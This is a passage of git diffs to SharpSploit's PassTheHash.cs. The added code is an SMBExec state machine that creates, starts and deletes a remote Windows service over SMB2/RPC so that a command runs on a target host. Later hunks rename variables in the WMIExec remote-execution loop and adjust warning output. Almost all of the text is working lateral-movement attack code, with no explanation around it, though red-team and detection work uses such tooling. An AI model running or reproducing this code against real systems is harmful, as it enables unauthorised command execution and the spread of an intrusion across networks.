+                                            SMBClientStage = "CreateServiceW_Middle";
+                                        }
+                                    }
+                                    break;
+
+                                case "CreateServiceW_Last":
+                                    {
+                                        SMB2_message_ID++;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        byte[] SCM_data_last = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SCM_data.Length);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_last);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadRequest";
+                                        SMB_client_stage_next = "StartServiceW";
+                                    }
+                                    break;
+
+                                case "StartServiceW":
+                                    {
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "00-00-00-00")
+                                        {
+                                            if (debug) { output.AppendLine(String.Format("Service {0} created on {1}", SMB_service, target)); }
+                                            SMB_service_context_handle = Utilities.GetByteRange(SMBClientReceive, 112, 131);
+                                            SMB2_message_ID += 20;
+                                            packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                            packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                            if (SMB_signing)
+                                            {
+                                                packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            }
+                                            OrderedDictionary packet_SCM_data = SMBExec.SCMStartServiceW(SMB_service_context_handle);
+                                            SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                            OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
+                                            byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                            OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
+                                            byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                            int RPC_data_length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
+                                            OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                            byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                            if (SMB_signing)
+                                            {
+                                                HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                                byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                                byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                                SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                                packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                                SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            }
+                                            SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                            SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                            SMBClientStage = "ReadRequest";
+                                            SMB_client_stage_next = "DeleteServiceW";
+                                        }
+                                        else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "31-04-00-00")
+                                        {
+                                            if (debug) { output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_service, target)); }
+                                            SMBExec_failed = true;
+                                        }
+                                        else
+                                        {
+                                            if (debug) { output.AppendLine("Service Creation Fault Context Mismatch."); }
+                                            SMBExec_failed = true;
+                                        }
+                                    }
+                                    break;
+
+                                case "DeleteServiceW":
+                                    {
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "1d-04-00-00")
+                                        {
+                                            output.AppendLine(String.Format("Command executed with service {0} on {1}", SMB_service, target));
+                                        }
+                                        else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "02-00-00-00")
+                                        {
+                                            output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_service, target));
+                                        }
+
+                                        SMB2_message_ID += 20;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+
+                                        OrderedDictionary packet_SCM_data = SMBExec.SCMDeleteServiceW(SMB_service_context_handle);
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        int RPC_data_length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadRequest";
+                                        SMB_client_stage_next = "CloseServiceHandle";
+                                        SMB_close_service_handle_stage = 1;
+                                    }
+                                    break;
+
+                                case "CloseServiceHandle":
+                                    {
+                                        OrderedDictionary packet_SCM_data;
+                                        if (SMB_close_service_handle_stage == 1)
+                                        {
+                                            Console.WriteLine("Service {0} deleted on {1}", SMB_service, target);
+                                            SMB2_message_ID += 20;
+                                            SMB_close_service_handle_stage++;
+                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_context_handle);
+                                        }
+                                        else
+                                        {
+                                            SMB2_message_ID++;
+                                            SMBClientStage = "CloseRequest";
+                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_manager_context_handle);
+                                        }
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        int RPC_data_length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+
+                                    }
+                                    break;
+                                case "CloseRequest":
+                                    {
+                                        SMB2_message_ID += 20;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x06, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2CloseRequest(SMB_file_ID);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "TreeDisconnect";
+                                    }
+                                    break;
+
+                                case "TreeDisconnect":
+                                    {
+                                        SMB2_message_ID++;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x04, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2TreeDisconnectRequest();
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "Logoff";
+                                    }
+                                    break;
+                                case "Logoff":
+                                    {
+                                        SMB2_message_ID += 20;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x02, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2SessionLogoffRequest();
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "exit";
+                                    }
+                                    break;
+                            }
+                        }
+                    }
+
+                }
+                SMBClient.Close();
+                SMBClientStream.Close();
+            }
+
+
+            return output.ToString();
+        }
+
+        private static byte[] SendStream(NetworkStream stream, byte[] BytesToSend)
+        {
+            byte[] BytesReceived = new byte[2048];
+            stream.Write(BytesToSend, 0, BytesToSend.Length);
+            stream.Flush();
+            stream.Read(BytesReceived, 0, BytesReceived.Length);
+            return BytesReceived;
+        }
+    }
+}
+

--- a/SharpSploit/LateralMovement/PassTheHash.cs
+++ b/SharpSploit/LateralMovement/PassTheHash.cs
@@ -2551,7 +2551,7 @@ namespace SharpSploit.LateralMovement
                                     {
                                          if (SMB_Close_Service_Handle_Stage == 1)
                                         {
-                                            Console.WriteLine("Service {0} deleted on {1}", SMB_Service, Target);
+                                            if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
                                             Service_Deleted = true;
                                             SMB2_Message_ID += 20;
                                             SMB_Close_Service_Handle_Stage++;
@@ -2678,7 +2678,7 @@ namespace SharpSploit.LateralMovement
                             }
                         }
                     }
-                    if (!Service_Deleted)
+                    if (!Service_Deleted && !AdminCheck)
                     {
                         output.AppendLine("Warning: Service not deleted. Please delete Service \"" + SMB_Service + "\" manually.");
                     }

--- a/SharpSploit/LateralMovement/PassTheHash.cs
+++ b/SharpSploit/LateralMovement/PassTheHash.cs
@@ -90,7 +90,7 @@ namespace SharpSploit.LateralMovement
             string Output_Username = String.Empty;
             string WMI_Random_Port_String = null;
             string Target_Long = String.Empty;
-            string WMI_client_stage = String.Empty;
+            string WMI_Client_Stage = String.Empty;
             string WMI_Data = String.Empty;
             string OXID = String.Empty;
             StringBuilder output = new StringBuilder();
@@ -551,7 +551,7 @@ namespace SharpSploit.LateralMovement
                             OXID_Index = WMI_Data.IndexOf(OXID);
                             OXID_Bytes_Index = OXID_Index / 2;
                             Object_UUID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31);
-                            WMI_client_stage = "AlterContext";
+                            WMI_Client_Stage = "AlterContext";
                         }
                         else
                         {
@@ -561,22 +561,22 @@ namespace SharpSploit.LateralMovement
 
                         //Moving on to Command Execution
                         int Request_Split_Index = 5500;
-                        string WMI_client_stage_next = "";
+                        string WMI_Client_Stage_Next = "";
                         bool Request_Split = false;
 
-                        while (WMI_client_stage != "exit")
+                        while (WMI_Client_Stage != "exit")
                         {
-                            if (debug) { output.AppendLine(WMI_client_stage); }
+                            if (debug) { output.AppendLine(WMI_Client_Stage); }
                             if (WMI_Client_Receive[2] == 3)
                             {
                                 string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
                                 string[] Error_Code_Array = Error_Code.Split('-');
                                 Error_Code = string.Join("", Error_Code_Array);
                                 output.AppendLine(String.Format("Execution failed with error code: 0x{0}", Error_Code.ToString()));
-                                WMI_client_stage = "exit";
+                                WMI_Client_Stage = "exit";
                             }
 
-                            switch (WMI_client_stage)
+                            switch (WMI_Client_Stage)
                             {
                                 case "AlterContext":
                                     {
@@ -587,7 +587,7 @@ namespace SharpSploit.LateralMovement
                                                     Alter_Context_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
                                                     Alter_Context_Context_ID = new byte[] { 0x02, 0x00 };
                                                     Alter_Context_UUID = new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 };
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
                                                 }
                                                 break;
                                             case 1:
@@ -595,7 +595,7 @@ namespace SharpSploit.LateralMovement
                                                     Alter_Context_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
                                                     Alter_Context_Context_ID = new byte[] { 0x03, 0x00 };
                                                     Alter_Context_UUID = new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 };
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
                                                 }
                                                 break;
                                             case 6:
@@ -603,14 +603,14 @@ namespace SharpSploit.LateralMovement
                                                     Alter_Context_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
                                                     Alter_Context_Context_ID = new byte[] { 0x04, 0x00 };
                                                     Alter_Context_UUID = new byte[] { 0x99, 0xdc, 0x56, 0x95, 0x8c, 0x82, 0xcf, 0x11, 0xa3, 0x7e, 0x00, 0xaa, 0x00, 0x32, 0x40, 0xc7 };
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
                                                 }
                                                 break;
                                         }
                                         Packet_RPC = WMIExec.RPCAlterContext(Assoc_Group, Alter_Context_Call_ID, Alter_Context_Context_ID, Alter_Context_UUID);
                                         WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
                                         WMI_Client_Receive = SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
-                                        WMI_client_stage = WMI_client_stage_next;
+                                        WMI_Client_Stage = WMI_Client_Stage_Next;
                                     }
                                     break;
                                 case "Request":
@@ -627,7 +627,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Opnum = new byte[] { 0x03, 0x00 };
                                                     Request_UUID = Object_UUID2;
                                                     Hostname_Length = BitConverter.GetBytes(Auth_Hostname.Length + 1);
-                                                    WMI_client_stage_next = "AlterContext";
+                                                    WMI_Client_Stage_Next = "AlterContext";
 
                                                     if (Convert.ToBoolean(Auth_Hostname.Length % 2))
                                                     {
@@ -658,7 +658,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Context_ID = new byte[] { 0x03, 0x00 };
                                                     Request_Opnum = new byte[] { 0x03, 0x00 };
                                                     Request_UUID = IPID;
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
                                                     Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
                                                         .Concat(Causality_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
@@ -675,7 +675,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_UUID = IPID;
                                                     WMI_Namespace_Length = BitConverter.GetBytes(Target_Short.Length + 14);
                                                     WMI_Namespace_Unicode = Encoding.Unicode.GetBytes("\\\\" + Target_Short + "\\root\\cimv2");
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
 
                                                     if (Convert.ToBoolean(Target_Short.Length % 2))
                                                     {
@@ -707,7 +707,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Call_ID = new byte[] { 0x06, 0x00, 0x00, 0x00 };
                                                     Request_Opnum = new byte[] { 0x05, 0x00 };
                                                     Request_UUID = Object_UUID;
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
                                                     WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
                                                     OXID_Index = WMI_Data.IndexOf(OXID);
                                                     OXID_Bytes_Index = OXID_Index / 2;
@@ -725,7 +725,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Call_ID = new byte[] { 0x07, 0x00, 0x00, 0x00 };
                                                     Request_Opnum = new byte[] { 0x03, 0x00 };
                                                     Request_UUID = Object_UUID;
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
                                                     Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x9e, 0xc1, 0xfc, 0xc3, 0x70, 0xa9, 0xd2, 0x11, 0x8b, 0x5a, 0x00, 0xa0, 0xc9, 0xb7, 0xc9, 0xc4 });
                                                     Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
 
@@ -741,7 +741,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Context_ID = new byte[] { 0x00, 0x00 };
                                                     Request_Opnum = new byte[] { 0x03, 0x00 };
                                                     Request_UUID = Object_UUID;
-                                                    WMI_client_stage_next = "AlterContext";
+                                                    WMI_Client_Stage_Next = "AlterContext";
                                                     Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x83, 0xb2, 0x96, 0xb1, 0xb4, 0xba, 0x1a, 0x10, 0xb6, 0x9c, 0x00, 0xaa, 0x00, 0x34, 0x1d, 0x07 });
                                                     Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
                                                 }
@@ -755,7 +755,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
                                                     Request_Opnum = new byte[] { 0x06, 0x00 };
                                                     Request_UUID = IPID2;
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
 
                                                     Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
                                                         .Concat(Causality_ID_Bytes)
@@ -771,7 +771,7 @@ namespace SharpSploit.LateralMovement
                                                     Request_Call_ID = new byte[] { 0x10, 0x00, 0x00, 0x00 };
                                                     Request_Opnum = new byte[] { 0x06, 0x00 };
                                                     Request_UUID = IPID2;
-                                                    WMI_client_stage_next = "Request";
+                                                    WMI_Client_Stage_Next = "Request";
 
                                                     Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
                                                         .Concat(Causality_ID_Bytes)
@@ -835,7 +835,7 @@ namespace SharpSploit.LateralMovement
                                                         if (Stub_Data.Length < Request_Split_Index)
                                                         {
                                                             Request_Flags = new byte[] { 0x83 };
-                                                            WMI_client_stage_next = "Result";
+                                                            WMI_Client_Stage_Next = "Result";
                                                         }
                                                         else
                                                         {
@@ -849,7 +849,7 @@ namespace SharpSploit.LateralMovement
                                                                 Sequence_Number_Counter = 10;
                                                                 Request_Flags = new byte[] { 0x81 };
                                                                 Request_Split_Index_Tracker = Request_Split_Index;
-                                                                WMI_client_stage_next = "Request";
+                                                                WMI_Client_Stage_Next = "Request";
                                                             }
                                                             else if (Request_Split_Stage == Request_Split_stage_final)
                                                             {
@@ -858,7 +858,7 @@ namespace SharpSploit.LateralMovement
                                                                 Request_Split_Stage = 0;
                                                                 Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Stub_Data.Length);
                                                                 Request_Flags = new byte[] { 0x82 };
-                                                                WMI_client_stage_next = "Result";
+                                                                WMI_Client_Stage_Next = "Result";
                                                             }
                                                             else
                                                             {
@@ -869,7 +869,7 @@ namespace SharpSploit.LateralMovement
                                                                 Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter);
                                                                 Sequence_Number_Counter++;
                                                                 Request_Flags = new byte[] { 0x80 };
-                                                                WMI_client_stage_next = "Request";
